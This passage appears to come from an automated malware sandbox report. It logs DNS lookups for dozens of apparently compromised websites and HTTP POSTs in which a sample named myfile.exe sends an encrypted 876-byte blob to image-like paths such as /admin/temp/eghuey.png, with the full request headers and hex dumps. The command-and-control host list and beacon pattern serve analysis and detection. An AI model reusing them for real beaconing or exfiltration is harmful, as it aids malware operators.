                                                              Sep 9, 2024 12:07:44.813524961 CEST192.168.2.41.1.1.10x9494Standard query (0)www.mieleshopping.itA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:47.703432083 CEST192.168.2.41.1.1.10xed44Standard query (0)holocine.deA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:51.064898014 CEST192.168.2.41.1.1.10xc00Standard query (0)oscommunity.deA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:53.644925117 CEST192.168.2.41.1.1.10x3499Standard query (0)ikadomus.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:53.655821085 CEST192.168.2.41.1.1.10xf24cStandard query (0)bundan.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:55.275046110 CEST192.168.2.41.1.1.10xc396Standard query (0)davedavisphotos.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:55.569734097 CEST192.168.2.41.1.1.10xb334Standard query (0)activeterroristwarningcompany.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:55.581552982 CEST192.168.2.41.1.1.10x62e7Standard query (0)hostaletdelsindians.esA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:56.888679981 CEST192.168.2.41.1.1.10xd722Standard query (0)www.hostaletdelsindians.esA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.103034019 CEST192.168.2.41.1.1.10x7ef6Standard query (0)almamidwifery.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.776489973 CEST192.168.2.41.1.1.10xc734Standard query (0)www.almamidwifery.comA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:08:00.438028097 CEST192.168.2.41.1.1.10x8c2fStandard query (0)innervisions-id.comA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Sep 9, 2024 12:07:03.716538906 CEST1.1.1.1192.168.2.40x84f1No error (0)parksideseniorliving.net35.215.83.253A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:05.237983942 CEST1.1.1.1192.168.2.40xfc6aName error (3)90nguyentuan.comnonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:05.270159960 CEST1.1.1.1192.168.2.40x197cName error (3)enactusnhlstenden.comnonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:05.281063080 CEST1.1.1.1192.168.2.40xe2fdName error (3)avisioninthedesert.comnonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:05.295304060 CEST1.1.1.1192.168.2.40x3318No error (0)lashandbrowenvy.com160.153.0.131A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:07.082232952 CEST1.1.1.1192.168.2.40xf6f3Name error (3)satoblog.orgnonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:07.457977057 CEST1.1.1.1192.168.2.40xef83No error (0)rsidesigns.com185.58.213.84A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:08.323786974 CEST1.1.1.1192.168.2.40x5e9cNo error (0)pansionatblago.ru89.108.65.79A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:09.911330938 CEST1.1.1.1192.168.2.40xb468No error (0)magrinya.net217.160.0.18A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:11.901187897 CEST1.1.1.1192.168.2.40x2d44Name error (3)baikalflot.runonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:12.064980984 CEST1.1.1.1192.168.2.40x3c81Name error (3)bd2fly.comnonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:12.102761030 CEST1.1.1.1192.168.2.40xa32fNo error (0)business-basic.de188.40.30.106A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:13.615361929 CEST1.1.1.1192.168.2.40xfcecNo error (0)afbudsrejserallinclusive.dk138.201.61.68A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:14.922874928 CEST1.1.1.1192.168.2.40x1b57No error (0)m2graph.fr89.116.147.189A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:16.556098938 CEST1.1.1.1192.168.2.40x13a4No error (0)stanleyqualitysystems.com208.73.140.70A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:17.329066992 CEST1.1.1.1192.168.2.40x9a57No error (0)karnesstanleyhvac.com208.73.140.70A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:18.487750053 CEST1.1.1.1192.168.2.40xf646No error (0)altitudeboise.com188.114.97.3A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:18.487750053 CEST1.1.1.1192.168.2.40xf646No error (0)altitudeboise.com188.114.96.3A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:19.333359003 CEST1.1.1.1192.168.2.40xe846No error (0)altitudetrampolinepark.com172.67.71.217A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:19.333359003 CEST1.1.1.1192.168.2.40xe846No error (0)altitudetrampolinepark.com104.26.1.120A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:19.333359003 CEST1.1.1.1192.168.2.40xe846No error (0)altitudetrampolinepark.com104.26.0.120A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:19.973772049 CEST1.1.1.1192.168.2.40x5ffbNo error (0)www.altitudetrampolinepark.com104.26.0.120A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:19.973772049 CEST1.1.1.1192.168.2.40x5ffbNo error (0)www.altitudetrampolinepark.com104.26.1.120A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:19.973772049 CEST1.1.1.1192.168.2.40x5ffbNo error (0)www.altitudetrampolinepark.com172.67.71.217A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:21.000067949 CEST1.1.1.1192.168.2.40x7aafNo error (0)lexced.com87.118.122.41A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:22.216485977 CEST1.1.1.1192.168.2.40xa8e4No error (0)www.lexced.comlexced.comCNAME (Canonical name)IN (0x0001)false
                                                              Sep 9, 2024 12:07:22.216485977 CEST1.1.1.1192.168.2.40xa8e4No error (0)lexced.com87.118.122.41A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:23.446269035 CEST1.1.1.1192.168.2.40x43c9No error (0)chainofhopeeurope.eu51.15.159.75A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:24.430177927 CEST1.1.1.1192.168.2.40x6222No error (0)bayshoreelite.com160.153.0.174A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:25.205933094 CEST1.1.1.1192.168.2.40xace6No error (0)mursall.de95.130.22.108A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:27.253137112 CEST1.1.1.1192.168.2.40xb1daNo error (0)amelielecompte.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
                                                              Sep 9, 2024 12:07:27.253137112 CEST1.1.1.1192.168.2.40xb1daNo error (0)lb.wordpress.com192.0.78.13A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:27.253137112 CEST1.1.1.1192.168.2.40xb1daNo error (0)lb.wordpress.com192.0.78.12A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:28.496293068 CEST1.1.1.1192.168.2.40xf20eServer failure (2)wribrazil.comnonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:28.515229940 CEST1.1.1.1192.168.2.40xc004No error (0)testitjavertailut.net188.114.96.3A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:28.515229940 CEST1.1.1.1192.168.2.40xc004No error (0)testitjavertailut.net188.114.97.3A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:29.145878077 CEST1.1.1.1192.168.2.40xb973No error (0)princebet88.site172.67.158.62A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:29.145878077 CEST1.1.1.1192.168.2.40xb973No error (0)princebet88.site104.21.81.70A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:30.607311964 CEST1.1.1.1192.168.2.40x7cd3Name error (3)chomiksy.netnonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:31.017535925 CEST1.1.1.1192.168.2.40x3525No error (0)vitoriaecoturismo.com.br134.209.129.254A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:31.874669075 CEST1.1.1.1192.168.2.40x6aaNo error (0)georgemuncey.com52.215.137.200A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:33.077308893 CEST1.1.1.1192.168.2.40x6c33No error (0)www.georgemuncey.comgeorgemuncey.comCNAME (Canonical name)IN (0x0001)false
                                                              Sep 9, 2024 12:07:33.077308893 CEST1.1.1.1192.168.2.40x6c33No error (0)georgemuncey.com52.215.137.200A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:34.392524004 CEST1.1.1.1192.168.2.40x52feName error (3)funworx.denonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:34.467374086 CEST1.1.1.1192.168.2.40xbc3No error (0)nbva.co.uk85.92.72.56A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:36.541937113 CEST1.1.1.1192.168.2.40x2968No error (0)c-sprop.com23.236.62.147A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:37.420089960 CEST1.1.1.1192.168.2.40x365aNo error (0)relevantonline.eu85.10.140.71A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:38.773215055 CEST1.1.1.1192.168.2.40x1865No error (0)abulanov.com188.246.227.29A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:40.020602942 CEST1.1.1.1192.168.2.40x1c86No error (0)maxcube24.com.ua185.68.16.21A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:41.803149939 CEST1.1.1.1192.168.2.40xf8b4No error (0)kenmccallum.com188.114.96.3A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:41.803149939 CEST1.1.1.1192.168.2.40xf8b4No error (0)kenmccallum.com188.114.97.3A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:42.483187914 CEST1.1.1.1192.168.2.40xd66eNo error (0)stage-infirmier.fr141.95.251.157A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:43.396322012 CEST1.1.1.1192.168.2.40x3cb3No error (0)skoczynski.eu46.242.240.159A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:43.747555971 CEST1.1.1.1192.168.2.40x6b4fNo error (0)mieleshopping.it35.214.166.193A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:45.541176081 CEST1.1.1.1192.168.2.40x9494No error (0)www.mieleshopping.it35.214.166.193A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:47.736159086 CEST1.1.1.1192.168.2.40xed44No error (0)holocine.de109.237.132.56A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:51.409773111 CEST1.1.1.1192.168.2.40xc00No error (0)oscommunity.de80.158.2.41A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:53.654057026 CEST1.1.1.1192.168.2.40x3499Name error (3)ikadomus.comnonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:53.722963095 CEST1.1.1.1192.168.2.40xf24cNo error (0)bundan.com35.214.211.239A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:55.486047983 CEST1.1.1.1192.168.2.40xc396Server failure (2)davedavisphotos.comnonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:55.579142094 CEST1.1.1.1192.168.2.40xb334Name error (3)activeterroristwarningcompany.comnonenoneA (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:55.735584021 CEST1.1.1.1192.168.2.40x62e7No error (0)hostaletdelsindians.es185.15.78.186A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:57.593336105 CEST1.1.1.1192.168.2.40xd722No error (0)www.hostaletdelsindians.eshostaletdelsindians.esCNAME (Canonical name)IN (0x0001)false
                                                              Sep 9, 2024 12:07:57.593336105 CEST1.1.1.1192.168.2.40xd722No error (0)hostaletdelsindians.es185.15.78.186A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.148766041 CEST1.1.1.1192.168.2.40x7ef6No error (0)almamidwifery.com198.185.159.145A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.148766041 CEST1.1.1.1192.168.2.40x7ef6No error (0)almamidwifery.com198.49.23.144A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.148766041 CEST1.1.1.1192.168.2.40x7ef6No error (0)almamidwifery.com198.49.23.145A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.148766041 CEST1.1.1.1192.168.2.40x7ef6No error (0)almamidwifery.com198.185.159.144A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.818485022 CEST1.1.1.1192.168.2.40xc734No error (0)www.almamidwifery.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.818485022 CEST1.1.1.1192.168.2.40xc734No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.818485022 CEST1.1.1.1192.168.2.40xc734No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.818485022 CEST1.1.1.1192.168.2.40xc734No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:07:59.818485022 CEST1.1.1.1192.168.2.40xc734No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                                              Sep 9, 2024 12:08:00.686120987 CEST1.1.1.1192.168.2.40x8c2fNo error (0)innervisions-id.com95.215.226.251A (IP address)IN (0x0001)false
                                                              • parksideseniorliving.net
                                                              • lashandbrowenvy.com
                                                              • rsidesigns.com
                                                              • pansionatblago.ru
                                                              • magrinya.net
                                                              • business-basic.de
                                                              • afbudsrejserallinclusive.dk
                                                              • m2graph.fr
                                                              • stanleyqualitysystems.com
                                                              • karnesstanleyhvac.com
                                                              • altitudeboise.com
                                                              • altitudetrampolinepark.com
                                                              • www.altitudetrampolinepark.com
                                                              • lexced.com
                                                              • www.lexced.com
                                                              • chainofhopeeurope.eu
                                                              • bayshoreelite.com
                                                              • mursall.de
                                                              • testitjavertailut.net
                                                              • princebet88.site
                                                              • vitoriaecoturismo.com.br
                                                              • georgemuncey.com
                                                              • www.georgemuncey.com
                                                              • nbva.co.uk
                                                              • c-sprop.com
                                                              • relevantonline.eu
                                                              • abulanov.com
                                                              • maxcube24.com.ua
                                                              • kenmccallum.com
                                                              • stage-infirmier.fr
                                                              • mieleshopping.it
                                                              • www.mieleshopping.it
                                                              • holocine.de
                                                              • oscommunity.de
                                                              • bundan.com
                                                              • hostaletdelsindians.es
                                                              • www.hostaletdelsindians.es
                                                              • almamidwifery.com
                                                              • www.almamidwifery.com
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.44973735.215.83.2534437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:04 UTC281OUTPOST /admin/temp/eghuey.png HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: parksideseniorliving.net
                                                              2024-09-09 10:07:04 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:05 UTC539INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:05 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              X-Cache-Enabled: True
                                                              X-Content-Type-Options: nosniff
                                                              X-XSS-Protection: 1; mode=block
                                                              Link: <https://parksideseniorliving.net/wp-json/>; rel="https://api.w.org/"
                                                              X-Httpd-Modphp: 1
                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                              X-Proxy-Cache-Info: DT:1
                                                              2024-09-09 10:07:05 UTC15845INData Raw: 66 65 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 20 3e 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e
                                                              Data Ascii: fe60<!DOCTYPE html><html lang="en-US"><head ><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449738160.153.0.1314437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:05 UTC274OUTPOST /admin/images/ff.gif HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: lashandbrowenvy.com
                                                              2024-09-09 10:07:05 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:07 UTC741INHTTP/1.1 404 Not Found
                                                              Date: Mon, 09 Sep 2024 10:07:06 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              content-security-policy: upgrade-insecure-requests
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              link: <https://lashandbrowenvy.com/wp-json/>; rel="https://api.w.org/"
                                                              strict-transport-security: max-age=300
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              x-cacheproxy-retries: 0/2
                                                              x-content-type-options: nosniff
                                                              x-fawn-proc-count: 1,0,24
                                                              x-php-version: 8.0
                                                              x-xss-protection: 1; mode=block
                                                              x-backend: varnish_ssl
                                                              CF-Cache-Status: DYNAMIC
                                                              Server: cloudflare
                                                              CF-RAY: 8c065e8d9c134390-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-09-09 10:07:07 UTC628INData Raw: 32 32 38 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 67 66 6f 72 6d 3b 67 66 6f 72 6d 7c 7c 28 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 67 66 6f 72 6d 5f 6d 61 69 6e 5f 73 63 72 69 70 74 73 5f 6c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 67 66 6f 72 6d 2e 73 63 72 69 70 74 73 4c 6f 61 64 65 64 3d 21 30 7d 29 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 67 66 6f 72 6d 2e 64 6f 6d 4c 6f 61 64 65 64 3d 21 30 7d 29 2c 67 66 6f 72 6d 3d 7b 64 6f 6d 4c 6f 61 64
                                                              Data Ascii: 2282<!DOCTYPE html><html lang="en-US"><head> <script>var gform;gform||(document.addEventListener("gform_main_scripts_loaded",function(){gform.scriptsLoaded=!0}),window.addEventListener("DOMContentLoaded",function(){gform.domLoaded=!0}),gform={domLoad
                                                              2024-09-09 10:07:07 UTC1369INData Raw: 65 72 22 2c 6f 2c 6e 2c 72 2c 74 29 7d 2c 64 6f 41 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 67 66 6f 72 6d 2e 64 6f 48 6f 6f 6b 28 22 61 63 74 69 6f 6e 22 2c 6f 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 61 70 70 6c 79 46 69 6c 74 65 72 73 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 67 66 6f 72 6d 2e 64 6f 48 6f 6f 6b 28 22 66 69 6c 74 65 72 22 2c 6f 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 72 65 6d 6f 76 65 41 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 6e 29 7b 67 66 6f 72 6d 2e 72 65 6d 6f 76 65 48 6f 6f 6b 28 22 61 63 74 69 6f 6e 22 2c 6f 2c 6e 29 7d 2c 72 65 6d 6f 76 65 46 69 6c 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 6e 2c 72 29 7b 67 66 6f 72 6d 2e 72 65 6d 6f 76 65 48 6f 6f 6b 28 22 66 69 6c 74 65 72 22 2c 6f 2c
                                                              Data Ascii: er",o,n,r,t)},doAction:function(o){gform.doHook("action",o,arguments)},applyFilters:function(o){return gform.doHook("filter",o,arguments)},removeAction:function(o,n){gform.removeHook("action",o,n)},removeFilter:function(o,n,r){gform.removeHook("filter",o,
                                                              2024-09-09 10:07:07 UTC1369INData Raw: 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4c 61 73 68 20 26 61 6d 70 3b 20 42 72 6f 77 20 45 6e 76 79 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4c 61 73 68 20 26 61 6d 70 3b 20 42 72 6f 77 20 45 6e 76 79 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4c 61 73 68 20 26 61 6d 70 3b 20 42 72 6f 77 20 45 6e 76 79 22 20
                                                              Data Ascii: gins/seo/ --><title>Page not found - Lash &amp; Brow Envy</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Lash &amp; Brow Envy" /><meta property="og:site_name" content="Lash &amp; Brow Envy"
                                                              2024-09-09 10:07:07 UTC1369INData Raw: 22 69 6d 61 67 65 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 30 6b 66 2e 66 62 63 2e 6d 79 66 74 70 75 70 6c 6f 61 64 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 7d 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 2f 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 2e 20 2d 2d 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 74 61 74 73 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65
                                                              Data Ascii: "image":{"@id":"https://0kf.fbc.myftpupload.com/#/schema/logo/image/"}}]}</script>... / Yoast SEO plugin. --><link rel='dns-prefetch' href='//stats.wp.com' /><link rel='dns-prefetch' href='//www.googletagmanager.com' /><link rel='dns-prefetch' hre
